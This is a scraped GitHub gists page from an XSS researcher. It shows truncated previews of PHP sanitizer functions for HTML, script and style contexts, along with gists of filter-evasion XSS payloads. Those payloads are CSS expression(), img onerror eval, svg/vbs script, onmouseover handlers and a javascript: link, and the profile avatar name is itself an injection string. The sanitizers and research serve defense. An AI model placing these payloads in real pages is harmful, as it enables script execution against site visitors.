Ashar Javed soaj1664
![http://xssplayground.net23.net/xss"onmouseover="alert(1);%20imagefile.svg](http://xssplayground.net23.net/xss"onmouseover="alert(1);%20imagefile.svg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
soaj1664
/ XSS Protection in 5 common contexts
Last active
September 8, 2022 07:01
Per-Context Sanitizer Functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * XSS protection function for HTML context only | |
| * @usecases | |
| * <title>use this function if output reflects here or as a content of any HTML tag.</title> | |
| * e.g., <span>use this function if output reflects here</span> | |
| * e.g., <div>use this function if output reflects here</div> | |
| * @description | |
| * Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| /** | |
| * XSS protection function for script context only | |
| * @usecases | |
| * @double quoted JavaScript string literal case e.g., | |
| * <script> var searchquery = "use this function if output reflects here"; </script> | |
| * @single quoted JavaScript string literal case e.g., | |
| * <script> var searchquery = 'use this function if output reflects here'; </script> | |
| * < is filtered because an attacker can prematuraley closes the script block | |
| * @description |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| /** | |
| * XSS protection function for style context only | |
| * @usecases | |
| * @double quoted case e.g., | |
| * <span style="use this function if output reflects here"></span> | |
| * @single quoted case e.g., | |
| * <div style='use this function if output reflects here'></div> | |
| * OR <style>use this function if output reflects here</style> | |
| * @description |
soaj1664
/ gist:10488000
Created
April 11, 2014 17:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| `xss <javascript:alert%28location%29>`_ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div style="color:rgb(''�x:expression(alert(1))"></div> | |
| <img/src=%00 id=confirm(1) onerror=eval(id) | |
| <div id=confirm(1) onmouseover=eval(id)>X</div> | |
| <span/onmouseover=confirm(1)>X</span> | |
| <svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83))) |